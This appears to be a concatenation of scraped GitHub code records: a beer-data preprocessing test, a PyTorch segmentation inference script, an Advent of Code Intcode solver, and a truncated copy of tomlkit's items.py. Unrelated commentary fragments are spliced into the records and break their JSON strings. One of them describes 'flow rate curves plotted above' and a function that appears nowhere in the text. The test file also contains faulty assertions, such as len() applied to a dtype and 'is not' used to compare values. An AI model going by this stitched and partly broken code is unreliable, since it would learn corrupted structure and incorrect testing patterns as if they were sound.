'float'\n assert 
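# Hedged reading aid for the "caudal" (flow rate) curves plotted above: the
# real computation lives in anl.analyze_avg, which is not shown, so
# flow_rate below is only a guess at the windowed estimate, with W the same
# window constant defined earlier.
def flow_rate(times, counts, W):
    # Q_i = (n_i - n_{i-W}) / (t_i - t_{i-W}): exits per second over a
    # sliding window of W events
    return [(counts[i] - counts[i - W]) / (times[i] - times[i - W])
            for i in range(W, len(counts))]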
data_scenario['FG'].dtype == 'float'\n assert data_scenario['PrimaryTemp'].dtype == 'float'\n assert data_scenario['Color'].dtype == 'float'\n assert data_scenario['IBU'].dtype == 'float'\n assert data_scenario['ABV'].dtype == 'float'\n assert data_scenario['BoilTime'].dtype == 'float'\n\n assert efficiency_dirty_length > len(data_scenario['Efficiency'])\n assert boil_gravity_dirty_length > len(data_scenario['BoilGravity'].dtype)\n assert fg_dirty_length > len(data_scenario['FG'].dtype)\n assert primary_temp_dirty_length > len(data_scenario['PrimaryTemp'].dtype)\n assert color_dirty_length > len(data_scenario['Color'].dtype)\n assert ibu_dirty_length > len(data_scenario['IBU'].dtype)\n assert abv_dirty_length > len(data_scenario['ABV'].dtype)\n assert boil_gravity_dirty_length > len(data_scenario['BoilTime'].dtype)\n\n\ndef test_drop_unuseful_columns(data):\n # Given\n unuse_columns = {'PitchRate', 'MashThickness', 'BeerID', 'StyleID',\n 'Name', 'PrimingAmount', 'PrimingMethod', 'UserId', 'Size(L)'}\n\n # When\n data_scenario = drop_unuseful_columns(data)\n data_scenario_columns = set(data_scenario.columns.values)\n # Then\n assert data_scenario_columns - unuse_columns == data_scenario_columns\n\n\ndef test_drop_garbage_columns(data):\n # Given\n garbage_columns = {'BoilSize', 'ugtft', 'index',\n 'nhbhgv', 'Unnamed: 22', 'Unnamed: 23', 'Unnamed: 0'}\n # When\n data_scenario = drop_gargbage_columns(data)\n data_scenario_columns = set(data_scenario.columns.values)\n # Then\n assert data_scenario_columns - garbage_columns == data_scenario_columns\n","repo_name":"SoftwareGHUq/analytical-processing-final-project","sub_path":"test/make_preprocessing_test.py","file_name":"make_preprocessing_test.py","file_ext":"py","file_size_in_byte":4338,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"41610768779","text":"import torch\nimport numpy as np\nimport cv2\nimport argparse\nimport config\nimport albumentations\n\nfrom PIL import Image\nfrom model import model\nfrom utils.helpers import draw_test_segmentation_map, image_overlay\n\n# construct the argument parser\nparser = argparse.ArgumentParser()\nparser.add_argument('-m', '--model-path', dest='model_path', required=True,\n help='path to the trained model weights')\nparser.add_argument('-i', '--input', required=True, \n help='path to input image')\nargs = vars(parser.parse_args())\n\n# define the image transforms\ntransform = albumentations.Compose([\n albumentations.Normalize(\n mean=[0.45734706, 0.43338275, 0.40058118],\n std=[0.23965294, 0.23532275, 0.2398498],\n always_apply=True)\n])\n\n# initialize the model\nmodel = model\n# load the model checkpoint\ncheckpoint = torch.load(args['model_path'])\n# load the trained weights\nmodel.load_state_dict(checkpoint['model_state_dict'])\n# load the model on to the computation device\nmodel.eval().to(config.DEVICE)\n\nimage = np.array(Image.open(args['input']).convert('RGB'))\n# make a copy of the image\norig_image = image.copy()\n# apply transforms\nimage = transform(image=image)['image']\n# tranpose dimensions\nimage = np.transpose(image, (2, 0, 1))\n# convert to torch tensors\nimage = torch.tensor(image, dtype=torch.float)\n# add batch dimension\nimage = image.unsqueeze(0).to(config.DEVICE)\n\n# forward pass through the model\noutputs = model(image)\noutputs = outputs['out']\n# get the segmentation map\nsegmented_image = draw_test_segmentation_map(outputs)\n# image overlay\nresult = image_overlay(orig_image, segmented_image)\n\n# visualize 
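# Two pitfalls in the assertions of this test module, with the forms that
# were presumably intended:
#
# 1) len(series.dtype) counts the dtype's fields (0 for a plain numeric
#    dtype), so checks like
#        assert boil_gravity_dirty_length > len(data_scenario['BoilGravity'].dtype)
#    are trivially true; the intent was most likely the column length:
#        assert boil_gravity_dirty_length > len(data_scenario['BoilGravity'])
#
# 2) `is not` compares object identity, not value; for the lengths and
#    floats compared in test_drop_nan and test_set_nan_for_numeric_outliers
#    the value comparison is what was meant:
#        assert len_before != len_after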
result\ncv2.imshow('Result', result)\ncv2.waitKey(0)\nsave_name = f\"{args['input'].split('/')[-1].split('.')[0]}\"\ncv2.imwrite(f\"outputs/{save_name}.jpg\", result)","repo_name":"sovit-123/CamVid-Image-Segmentation-using-FCN-ResNet50-with-PyTorch","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1834,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"34"} +{"seq_id":"12778122145","text":"# ======================================================================\r\n# Sunny with a Chance of Asteroids\r\n# Advent of Code 2019 Day 05 -- Eric Wastl -- https://adventofcode.com\r\n#\r\n# Computer simulation by Dr. Dean Earl Wright III\r\n# ======================================================================\r\n\r\n# ======================================================================\r\n# a o c _ c a . p y\r\n# ======================================================================\r\n\"Solve the Chance of Asteroids problem for Advent of Code 2019 day 02\"\r\n\r\n# ----------------------------------------------------------------------\r\n# import\r\n# ----------------------------------------------------------------------\r\nimport argparse\r\nimport sys\r\nimport intcode\r\n\r\n# ----------------------------------------------------------------------\r\n# constants\r\n# ----------------------------------------------------------------------\r\n\r\n# ----------------------------------------------------------------------\r\n# parse_commnd_line\r\n# ----------------------------------------------------------------------\r\n\r\n\r\ndef parse_command_line():\r\n \"Parse the command line options\"\r\n\r\n # 1. Create the command line parser\r\n desc = 'Chance of Asteroids - day 05 of Advent of Code 2019'\r\n sample = 'sample: python aoc_ca.py input.txt'\r\n parser = argparse.ArgumentParser(description=desc,\r\n epilog=sample)\r\n parser.add_argument('-v', '--verbose', action='store_true', default=False,\r\n dest='verbose', help='Print status messages to stdout')\r\n parser.add_argument('-p', '--part', action='store', default=1, type=int,\r\n dest='part', help='Puzzle Part (1 or 2)')\r\n parser.add_argument('-t', '--max-time', action='store', default=0, type=int,\r\n dest='maxtime', help='Maximum timer ticks before quitting')\r\n parser.add_argument('filepath', metavar='FILENAME', action='store', type=str,\r\n help=\"Location of puzzle input\")\r\n\r\n # 2. Get the options and arguments\r\n return parser.parse_args()\r\n\r\n# ----------------------------------------------------------------------\r\n# part_one\r\n# ----------------------------------------------------------------------\r\n\r\ndef part_one(args, input_lines):\r\n \"Process part one of the puzzle\"\r\n\r\n # 1. Optionally select fixup\r\n noun = None\r\n verb = None\r\n inp = [1]\r\n\r\n # 3. Create the computer with fixes\r\n computer = intcode.IntCode(text=input_lines[0], noun=noun, verb=verb, inp=inp)\r\n if args.verbose:\r\n print(\"The computer has %d positions\" % len(computer.positions))\r\n print(computer.instructions())\r\n\r\n # 3. Run the computer until it stops\r\n solution = computer.run(max_steps=args.maxtime, watch=args.verbose)\r\n\r\n # 4. Check it ran out of time\r\n if solution is None:\r\n print(\"No solution found after %d steps\" % args.maxtime)\r\n\r\n # 5. Check it stopped with an error\r\n elif solution != intcode.STOP_HLT:\r\n print(\"Computer alarm %d\" % solution)\r\n solution = None\r\n\r\n # 6. 
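# Hedged sketch of what draw_test_segmentation_map presumably does before
# the overlay above: argmax over class logits, then paint each class id
# with a palette color. logits_to_color_mask and palette are illustrative
# names, not the project's own helpers.
import numpy as np
import torch

def logits_to_color_mask(outputs: torch.Tensor, palette) -> np.ndarray:
    labels = outputs.squeeze(0).argmax(dim=0).cpu().numpy()  # (H, W) class ids
    mask = np.zeros((*labels.shape, 3), dtype=np.uint8)
    for cls_id, color in enumerate(palette):
        mask[labels == cls_id] = color                       # RGB triple
    return mask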
The solution is the last output\r\n else:\r\n output = computer.outputs()\r\n if len(output) == 0:\r\n print(\"There is no output, so no solution\")\r\n solution = None\r\n else:\r\n solution = output.pop()\r\n if len(output) > 0 and not all(x == 0 for x in output):\r\n print(\"final output is %d but other output not all zero %s\" %\r\n (solution, str(output)))\r\n solution = None\r\n else:\r\n print(\"The solution is %d\" % (solution))\r\n\r\n # 7. Return result\r\n return solution is not None\r\n\r\n# ----------------------------------------------------------------------\r\n# part_two\r\n# ----------------------------------------------------------------------\r\n\r\n\r\ndef part_two(args, input_lines):\r\n \"Process part two of the puzzle\"\r\n\r\n # 1. Optionally select fixup\r\n noun = None\r\n verb = None\r\n inp = [5]\r\n\r\n # 3. Create the computer with fixes\r\n computer = intcode.IntCode(text=input_lines[0], noun=noun, verb=verb, inp=inp)\r\n if args.verbose:\r\n print(\"The computer has %d positions\" % len(computer.positions))\r\n print(computer.instructions())\r\n\r\n # 3. Run the computer until it stops\r\n solution = computer.run(max_steps=args.maxtime, watch=args.verbose)\r\n\r\n # 4. Check it ran out of time\r\n if solution is None:\r\n print(\"No solution found after %d steps\" % args.maxtime)\r\n\r\n # 5. Check it stopped with an error\r\n elif solution != intcode.STOP_HLT:\r\n print(\"Computer alarm %d\" % solution)\r\n solution = None\r\n\r\n # 6. The solution is the last output\r\n else:\r\n output = computer.outputs()\r\n if len(output) == 0:\r\n print(\"There is no output, so no solution\")\r\n solution = None\r\n else:\r\n solution = output.pop()\r\n if len(output) > 0 and not all(x == 0 for x in output):\r\n print(\"final output is %d but other output not all zero %s\" %\r\n (solution, str(output)))\r\n solution = None\r\n else:\r\n print(\"The solution is %d\" % (solution))\r\n\r\n # 7. Return result\r\n return solution is not None\r\n\r\n# ----------------------------------------------------------------------\r\n# from_file\r\n# ----------------------------------------------------------------------\r\n\r\n\r\ndef from_file(filepath):\r\n \"Read the file\"\r\n\r\n return from_text(open(filepath).read())\r\n\r\n# ----------------------------------------------------------------------\r\n# from_text\r\n# ----------------------------------------------------------------------\r\n\r\n\r\ndef from_text(text):\r\n \"Break the text into trimed, non-comment lines\"\r\n\r\n # 1. We start with no lines\r\n lines = []\r\n\r\n # 2. Loop for lines in the text\r\n for line in text.split('\\n'):\r\n\r\n # 3. But ignore blank and non-claim lines\r\n line = line.rstrip(' \\r')\r\n if not line:\r\n continue\r\n if line.startswith('#'):\r\n continue\r\n\r\n # 4. Add the line\r\n lines.append(line)\r\n\r\n # 5. Return a list of clean lines\r\n return lines\r\n\r\n# ----------------------------------------------------------------------\r\n# main\r\n# ----------------------------------------------------------------------\r\n\r\n\r\ndef main():\r\n \"\"\"Read Program Alarm and solve it\"\"\"\r\n\r\n # 1. Get the command line options\r\n args = parse_command_line()\r\n\r\n # 2. Read the puzzle file\r\n input_text = from_file(args.filepath)\r\n\r\n # 3. Process the appropiate part of the puzzle\r\n if args.part == 1:\r\n result = part_one(args, input_text)\r\n else:\r\n result = part_two(args, input_text)\r\n\r\n # 5. 
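# part_one and part_two above differ only in the diagnostic input (1 vs 5).
# A hedged refactor could share one body; run_diagnostic is a name
# introduced here, it reuses the module's intcode import, and it drops the
# "all other output is zero" validation for brevity.
def run_diagnostic(args, input_lines, system_id):
    computer = intcode.IntCode(text=input_lines[0], noun=None, verb=None,
                               inp=[system_id])
    if computer.run(max_steps=args.maxtime, watch=args.verbose) != intcode.STOP_HLT:
        return None
    output = computer.outputs()
    return output.pop() if output else None

# part_one would then reduce to run_diagnostic(args, input_lines, 1) and
# part_two to run_diagnostic(args, input_lines, 5).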
Set return code (0 if solution found, 2 if not)\r\n if result:\r\n sys.exit(0)\r\n sys.exit(2)\r\n\r\n\r\n# ----------------------------------------------------------------------\r\n# module initialization\r\n# ----------------------------------------------------------------------\r\nif __name__ == '__main__':\r\n main()\r\n\r\n# ======================================================================\r\n# end a o c _ c a . p y end\r\n# ======================================================================\r\n","repo_name":"deanearlwright/AdventOfCode","sub_path":"2019/05_ChanceAsteroids/aoc_ca.py","file_name":"aoc_ca.py","file_ext":"py","file_size_in_byte":7942,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"35849329511","text":"from __future__ import annotations\n\nimport abc\nimport copy\nimport dataclasses\nimport math\nimport re\nimport string\nimport sys\n\nfrom datetime import date\nfrom datetime import datetime\nfrom datetime import time\nfrom datetime import tzinfo\nfrom enum import Enum\nfrom typing import TYPE_CHECKING\nfrom typing import Any\nfrom typing import Callable\nfrom typing import Collection\nfrom typing import Iterable\nfrom typing import Iterator\nfrom typing import Sequence\nfrom typing import TypeVar\nfrom typing import cast\nfrom typing import overload\n\nfrom pipenv.vendor.tomlkit._compat import PY38\nfrom pipenv.vendor.tomlkit._compat import decode\nfrom pipenv.vendor.tomlkit._types import _CustomDict\nfrom pipenv.vendor.tomlkit._types import _CustomFloat\nfrom pipenv.vendor.tomlkit._types import _CustomInt\nfrom pipenv.vendor.tomlkit._types import _CustomList\nfrom pipenv.vendor.tomlkit._types import wrap_method\nfrom pipenv.vendor.tomlkit._utils import CONTROL_CHARS\nfrom pipenv.vendor.tomlkit._utils import escape_string\nfrom pipenv.vendor.tomlkit.exceptions import InvalidStringError\n\n\nif TYPE_CHECKING:\n from pipenv.vendor.tomlkit import container\n\n\nItemT = TypeVar(\"ItemT\", bound=\"Item\")\nEncoder = Callable[[Any], \"Item\"]\nCUSTOM_ENCODERS: list[Encoder] = []\nAT = TypeVar(\"AT\", bound=\"AbstractTable\")\n\n\nclass _ConvertError(TypeError, ValueError):\n \"\"\"An internal error raised when item() fails to convert a value.\n It should be a TypeError, but due to historical reasons\n it needs to subclass ValueError as well.\n \"\"\"\n\n\n@overload\ndef item(value: bool, _parent: Item | None = ..., _sort_keys: bool = ...) -> Bool:\n ...\n\n\n@overload\ndef item(value: int, _parent: Item | None = ..., _sort_keys: bool = ...) -> Integer:\n ...\n\n\n@overload\ndef item(value: float, _parent: Item | None = ..., _sort_keys: bool = ...) -> Float:\n ...\n\n\n@overload\ndef item(value: str, _parent: Item | None = ..., _sort_keys: bool = ...) -> String:\n ...\n\n\n@overload\ndef item(\n value: datetime, _parent: Item | None = ..., _sort_keys: bool = ...\n) -> DateTime:\n ...\n\n\n@overload\ndef item(value: date, _parent: Item | None = ..., _sort_keys: bool = ...) -> Date:\n ...\n\n\n@overload\ndef item(value: time, _parent: Item | None = ..., _sort_keys: bool = ...) -> Time:\n ...\n\n\n@overload\ndef item(\n value: Sequence[dict], _parent: Item | None = ..., _sort_keys: bool = ...\n) -> AoT:\n ...\n\n\n@overload\ndef item(value: Sequence, _parent: Item | None = ..., _sort_keys: bool = ...) -> Array:\n ...\n\n\n@overload\ndef item(value: dict, _parent: Array = ..., _sort_keys: bool = ...) -> InlineTable:\n ...\n\n\n@overload\ndef item(value: dict, _parent: Item | None = ..., _sort_keys: bool = ...) 
-> Table:\n ...\n\n\n@overload\ndef item(value: ItemT, _parent: Item | None = ..., _sort_keys: bool = ...) -> ItemT:\n ...\n\n\ndef item(value: Any, _parent: Item | None = None, _sort_keys: bool = False) -> Item:\n \"\"\"Create a TOML item from a Python object.\n\n :Example:\n\n >>> item(42)\n 42\n >>> item([1, 2, 3])\n [1, 2, 3]\n >>> item({'a': 1, 'b': 2})\n a = 1\n b = 2\n \"\"\"\n\n from pipenv.vendor.tomlkit.container import Container\n\n if isinstance(value, Item):\n return value\n\n if isinstance(value, bool):\n return Bool(value, Trivia())\n elif isinstance(value, int):\n return Integer(value, Trivia(), str(value))\n elif isinstance(value, float):\n return Float(value, Trivia(), str(value))\n elif isinstance(value, dict):\n table_constructor = (\n InlineTable if isinstance(_parent, (Array, InlineTable)) else Table\n )\n val = table_constructor(Container(), Trivia(), False)\n for k, v in sorted(\n value.items(),\n key=lambda i: (isinstance(i[1], dict), i[0]) if _sort_keys else 1,\n ):\n val[k] = item(v, _parent=val, _sort_keys=_sort_keys)\n\n return val\n elif isinstance(value, (list, tuple)):\n if (\n value\n and all(isinstance(v, dict) for v in value)\n and (_parent is None or isinstance(_parent, Table))\n ):\n a = AoT([])\n table_constructor = Table\n else:\n a = Array([], Trivia())\n table_constructor = InlineTable\n\n for v in value:\n if isinstance(v, dict):\n table = table_constructor(Container(), Trivia(), True)\n\n for k, _v in sorted(\n v.items(),\n key=lambda i: (isinstance(i[1], dict), i[0] if _sort_keys else 1),\n ):\n i = item(_v, _parent=table, _sort_keys=_sort_keys)\n if isinstance(table, InlineTable):\n i.trivia.trail = \"\"\n\n table[k] = i\n\n v = table\n\n a.append(v)\n\n return a\n elif isinstance(value, str):\n return String.from_raw(value)\n elif isinstance(value, datetime):\n return DateTime(\n value.year,\n value.month,\n value.day,\n value.hour,\n value.minute,\n value.second,\n value.microsecond,\n value.tzinfo,\n Trivia(),\n value.isoformat().replace(\"+00:00\", \"Z\"),\n )\n elif isinstance(value, date):\n return Date(value.year, value.month, value.day, Trivia(), value.isoformat())\n elif isinstance(value, time):\n return Time(\n value.hour,\n value.minute,\n value.second,\n value.microsecond,\n value.tzinfo,\n Trivia(),\n value.isoformat(),\n )\n else:\n for encoder in CUSTOM_ENCODERS:\n try:\n rv = encoder(value)\n except TypeError:\n pass\n else:\n if not isinstance(rv, Item):\n raise _ConvertError(\n f\"Custom encoder returned {type(rv)}, not a subclass of Item\"\n )\n return rv\n\n raise _ConvertError(f\"Invalid type {type(value)}\")\n\n\nclass StringType(Enum):\n # Single Line Basic\n SLB = '\"'\n # Multi Line Basic\n MLB = '\"\"\"'\n # Single Line Literal\n SLL = \"'\"\n # Multi Line Literal\n MLL = \"'''\"\n\n @classmethod\n def select(cls, literal=False, multiline=False) -> StringType:\n return {\n (False, False): cls.SLB,\n (False, True): cls.MLB,\n (True, False): cls.SLL,\n (True, True): cls.MLL,\n }[(literal, multiline)]\n\n @property\n def escaped_sequences(self) -> Collection[str]:\n # https://toml.io/en/v1.0.0#string\n escaped_in_basic = CONTROL_CHARS | {\"\\\\\"}\n allowed_in_multiline = {\"\\n\", \"\\r\"}\n return {\n StringType.SLB: escaped_in_basic | {'\"'},\n StringType.MLB: (escaped_in_basic | {'\"\"\"'}) - allowed_in_multiline,\n StringType.SLL: (),\n StringType.MLL: (),\n }[self]\n\n @property\n def invalid_sequences(self) -> Collection[str]:\n # https://toml.io/en/v1.0.0#string\n forbidden_in_literal = CONTROL_CHARS - {\"\\t\"}\n 
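# Quick usage of item() as defined above. The import assumes tomlkit is
# available as a top-level package; in this tree it is vendored under
# pipenv.vendor.tomlkit.
from tomlkit.items import item

doc = item({"name": "demo", "tags": ["a", "b"]})
print(doc.as_string())
# name = "demo"
# tags = ["a", "b"]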
allowed_in_multiline = {\"\\n\", \"\\r\"}\n return {\n StringType.SLB: (),\n StringType.MLB: (),\n StringType.SLL: forbidden_in_literal | {\"'\"},\n StringType.MLL: (forbidden_in_literal | {\"'''\"}) - allowed_in_multiline,\n }[self]\n\n @property\n def unit(self) -> str:\n return self.value[0]\n\n def is_basic(self) -> bool:\n return self in {StringType.SLB, StringType.MLB}\n\n def is_literal(self) -> bool:\n return self in {StringType.SLL, StringType.MLL}\n\n def is_singleline(self) -> bool:\n return self in {StringType.SLB, StringType.SLL}\n\n def is_multiline(self) -> bool:\n return self in {StringType.MLB, StringType.MLL}\n\n def toggle(self) -> StringType:\n return {\n StringType.SLB: StringType.MLB,\n StringType.MLB: StringType.SLB,\n StringType.SLL: StringType.MLL,\n StringType.MLL: StringType.SLL,\n }[self]\n\n\nclass BoolType(Enum):\n TRUE = \"true\"\n FALSE = \"false\"\n\n def __bool__(self):\n return {BoolType.TRUE: True, BoolType.FALSE: False}[self]\n\n def __iter__(self):\n return iter(self.value)\n\n def __len__(self):\n return len(self.value)\n\n\n@dataclasses.dataclass\nclass Trivia:\n \"\"\"\n Trivia information (aka metadata).\n \"\"\"\n\n # Whitespace before a value.\n indent: str = \"\"\n # Whitespace after a value, but before a comment.\n comment_ws: str = \"\"\n # Comment, starting with # character, or empty string if no comment.\n comment: str = \"\"\n # Trailing newline.\n trail: str = \"\\n\"\n\n def copy(self) -> Trivia:\n return dataclasses.replace(self)\n\n\nclass KeyType(Enum):\n \"\"\"\n The type of a Key.\n\n Keys can be bare (unquoted), or quoted using basic (\"), or literal (')\n quotes following the same escaping rules as single-line StringType.\n \"\"\"\n\n Bare = \"\"\n Basic = '\"'\n Literal = \"'\"\n\n\nclass Key(abc.ABC):\n \"\"\"Base class for a key\"\"\"\n\n sep: str\n _original: str\n _keys: list[SingleKey]\n _dotted: bool\n key: str\n\n @abc.abstractmethod\n def __hash__(self) -> int:\n pass\n\n @abc.abstractmethod\n def __eq__(self, __o: object) -> bool:\n pass\n\n def is_dotted(self) -> bool:\n \"\"\"If the key is followed by other keys\"\"\"\n return self._dotted\n\n def __iter__(self) -> Iterator[SingleKey]:\n return iter(self._keys)\n\n def concat(self, other: Key) -> DottedKey:\n \"\"\"Concatenate keys into a dotted key\"\"\"\n keys = self._keys + other._keys\n return DottedKey(keys, sep=self.sep)\n\n def is_multi(self) -> bool:\n \"\"\"Check if the key contains multiple keys\"\"\"\n return len(self._keys) > 1\n\n def as_string(self) -> str:\n \"\"\"The TOML representation\"\"\"\n return self._original\n\n def __str__(self) -> str:\n return self.as_string()\n\n def __repr__(self) -> str:\n return f\"\"\n\n\nclass SingleKey(Key):\n \"\"\"A single key\"\"\"\n\n def __init__(\n self,\n k: str,\n t: KeyType | None = None,\n sep: str | None = None,\n original: str | None = None,\n ) -> None:\n if t is None:\n if not k or any(\n c not in string.ascii_letters + string.digits + \"-\" + \"_\" for c in k\n ):\n t = KeyType.Basic\n else:\n t = KeyType.Bare\n\n self.t = t\n if sep is None:\n sep = \" = \"\n\n self.sep = sep\n self.key = k\n if original is None:\n key_str = escape_string(k) if t == KeyType.Basic else k\n original = f\"{t.value}{key_str}{t.value}\"\n\n self._original = original\n self._keys = [self]\n self._dotted = False\n\n @property\n def delimiter(self) -> str:\n \"\"\"The delimiter: double quote/single quote/none\"\"\"\n return self.t.value\n\n def is_bare(self) -> bool:\n \"\"\"Check if the key is bare\"\"\"\n return self.t == 
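# Sanity checks against the StringType tables above (same import caveat as
# before):
from tomlkit.items import StringType

assert StringType.select(literal=True, multiline=True) is StringType.MLL
assert StringType.MLB.toggle() is StringType.SLB
assert StringType.SLL.is_literal() and StringType.SLL.is_singleline()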
KeyType.Bare\n\n def __hash__(self) -> int:\n return hash(self.key)\n\n def __eq__(self, other: Any) -> bool:\n if isinstance(other, Key):\n return isinstance(other, SingleKey) and self.key == other.key\n\n return self.key == other\n\n\nclass DottedKey(Key):\n def __init__(\n self,\n keys: Iterable[SingleKey],\n sep: str | None = None,\n original: str | None = None,\n ) -> None:\n self._keys = list(keys)\n if original is None:\n original = \".\".join(k.as_string() for k in self._keys)\n\n self.sep = \" = \" if sep is None else sep\n self._original = original\n self._dotted = False\n self.key = \".\".join(k.key for k in self._keys)\n\n def __hash__(self) -> int:\n return hash(tuple(self._keys))\n\n def __eq__(self, __o: object) -> bool:\n return isinstance(__o, DottedKey) and self._keys == __o._keys\n\n\nclass Item:\n \"\"\"\n An item within a TOML document.\n \"\"\"\n\n def __init__(self, trivia: Trivia) -> None:\n self._trivia = trivia\n\n @property\n def trivia(self) -> Trivia:\n \"\"\"The trivia element associated with this item\"\"\"\n return self._trivia\n\n @property\n def discriminant(self) -> int:\n raise NotImplementedError()\n\n def as_string(self) -> str:\n \"\"\"The TOML representation\"\"\"\n raise NotImplementedError()\n\n @property\n def value(self) -> Any:\n return self\n\n def unwrap(self) -> Any:\n \"\"\"Returns as pure python object (ppo)\"\"\"\n raise NotImplementedError()\n\n # Helpers\n\n def comment(self, comment: str) -> Item:\n \"\"\"Attach a comment to this item\"\"\"\n if not comment.strip().startswith(\"#\"):\n comment = \"# \" + comment\n\n self._trivia.comment_ws = \" \"\n self._trivia.comment = comment\n\n return self\n\n def indent(self, indent: int) -> Item:\n \"\"\"Indent this item with given number of spaces\"\"\"\n if self._trivia.indent.startswith(\"\\n\"):\n self._trivia.indent = \"\\n\" + \" \" * indent\n else:\n self._trivia.indent = \" \" * indent\n\n return self\n\n def is_boolean(self) -> bool:\n return isinstance(self, Bool)\n\n def is_table(self) -> bool:\n return isinstance(self, Table)\n\n def is_inline_table(self) -> bool:\n return isinstance(self, InlineTable)\n\n def is_aot(self) -> bool:\n return isinstance(self, AoT)\n\n def _getstate(self, protocol=3):\n return (self._trivia,)\n\n def __reduce__(self):\n return self.__reduce_ex__(2)\n\n def __reduce_ex__(self, protocol):\n return self.__class__, self._getstate(protocol)\n\n\nclass Whitespace(Item):\n \"\"\"\n A whitespace literal.\n \"\"\"\n\n def __init__(self, s: str, fixed: bool = False) -> None:\n self._s = s\n self._fixed = fixed\n\n @property\n def s(self) -> str:\n return self._s\n\n @property\n def value(self) -> str:\n \"\"\"The wrapped string of the whitespace\"\"\"\n return self._s\n\n @property\n def trivia(self) -> Trivia:\n raise RuntimeError(\"Called trivia on a Whitespace variant.\")\n\n @property\n def discriminant(self) -> int:\n return 0\n\n def is_fixed(self) -> bool:\n \"\"\"If the whitespace is fixed, it can't be merged or discarded from the output.\"\"\"\n return self._fixed\n\n def as_string(self) -> str:\n return self._s\n\n def __repr__(self) -> str:\n return f\"<{self.__class__.__name__} {repr(self._s)}>\"\n\n def _getstate(self, protocol=3):\n return self._s, self._fixed\n\n\nclass Comment(Item):\n \"\"\"\n A comment literal.\n \"\"\"\n\n @property\n def discriminant(self) -> int:\n return 1\n\n def as_string(self) -> str:\n return (\n f\"{self._trivia.indent}{decode(self._trivia.comment)}{self._trivia.trail}\"\n )\n\n def __str__(self) -> str:\n return 
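# Bare, quoted and dotted keys as the classes above produce them:
from tomlkit.items import SingleKey

assert SingleKey("tool").as_string() == "tool"          # bare
assert SingleKey("my key").as_string() == '"my key"'    # auto-quoted (space)
dotted = SingleKey("tool").concat(SingleKey("poetry"))
assert dotted.as_string() == "tool.poetry" and dotted.is_multi()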
f\"{self._trivia.indent}{decode(self._trivia.comment)}\"\n\n\nclass Integer(Item, _CustomInt):\n \"\"\"\n An integer literal.\n \"\"\"\n\n def __new__(cls, value: int, trivia: Trivia, raw: str) -> Integer:\n return int.__new__(cls, value)\n\n def __init__(self, value: int, trivia: Trivia, raw: str) -> None:\n super().__init__(trivia)\n self._original = value\n self._raw = raw\n self._sign = False\n\n if re.match(r\"^[+\\-]\\d+$\", raw):\n self._sign = True\n\n def unwrap(self) -> int:\n return self._original\n\n __int__ = unwrap\n\n def __hash__(self) -> int:\n return hash(self.unwrap())\n\n @property\n def discriminant(self) -> int:\n return 2\n\n @property\n def value(self) -> int:\n \"\"\"The wrapped integer value\"\"\"\n return self\n\n def as_string(self) -> str:\n return self._raw\n\n def _new(self, result):\n raw = str(result)\n if self._sign:\n sign = \"+\" if result >= 0 else \"-\"\n raw = sign + raw\n\n return Integer(result, self._trivia, raw)\n\n def _getstate(self, protocol=3):\n return int(self), self._trivia, self._raw\n\n # int methods\n __abs__ = wrap_method(int.__abs__)\n __add__ = wrap_method(int.__add__)\n __and__ = wrap_method(int.__and__)\n __ceil__ = wrap_method(int.__ceil__)\n __eq__ = int.__eq__\n __floor__ = wrap_method(int.__floor__)\n __floordiv__ = wrap_method(int.__floordiv__)\n __invert__ = wrap_method(int.__invert__)\n __le__ = int.__le__\n __lshift__ = wrap_method(int.__lshift__)\n __lt__ = int.__lt__\n __mod__ = wrap_method(int.__mod__)\n __mul__ = wrap_method(int.__mul__)\n __neg__ = wrap_method(int.__neg__)\n __or__ = wrap_method(int.__or__)\n __pos__ = wrap_method(int.__pos__)\n __pow__ = wrap_method(int.__pow__)\n __radd__ = wrap_method(int.__radd__)\n __rand__ = wrap_method(int.__rand__)\n __rfloordiv__ = wrap_method(int.__rfloordiv__)\n __rlshift__ = wrap_method(int.__rlshift__)\n __rmod__ = wrap_method(int.__rmod__)\n __rmul__ = wrap_method(int.__rmul__)\n __ror__ = wrap_method(int.__ror__)\n __round__ = wrap_method(int.__round__)\n __rpow__ = wrap_method(int.__rpow__)\n __rrshift__ = wrap_method(int.__rrshift__)\n __rshift__ = wrap_method(int.__rshift__)\n __rtruediv__ = wrap_method(int.__rtruediv__)\n __rxor__ = wrap_method(int.__rxor__)\n __truediv__ = wrap_method(int.__truediv__)\n __trunc__ = wrap_method(int.__trunc__)\n __xor__ = wrap_method(int.__xor__)\n\n\nclass Float(Item, _CustomFloat):\n \"\"\"\n A float literal.\n \"\"\"\n\n def __new__(cls, value: float, trivia: Trivia, raw: str) -> Float:\n return float.__new__(cls, value)\n\n def __init__(self, value: float, trivia: Trivia, raw: str) -> None:\n super().__init__(trivia)\n self._original = value\n self._raw = raw\n self._sign = False\n\n if re.match(r\"^[+\\-].+$\", raw):\n self._sign = True\n\n def unwrap(self) -> float:\n return self._original\n\n __float__ = unwrap\n\n def __hash__(self) -> int:\n return hash(self.unwrap())\n\n @property\n def discriminant(self) -> int:\n return 3\n\n @property\n def value(self) -> float:\n \"\"\"The wrapped float value\"\"\"\n return self\n\n def as_string(self) -> str:\n return self._raw\n\n def _new(self, result):\n raw = str(result)\n\n if self._sign:\n sign = \"+\" if result >= 0 else \"-\"\n raw = sign + raw\n\n return Float(result, self._trivia, raw)\n\n def _getstate(self, protocol=3):\n return float(self), self._trivia, self._raw\n\n # float methods\n __abs__ = wrap_method(float.__abs__)\n __add__ = wrap_method(float.__add__)\n __eq__ = float.__eq__\n __floordiv__ = wrap_method(float.__floordiv__)\n __le__ = float.__le__\n __lt__ = 
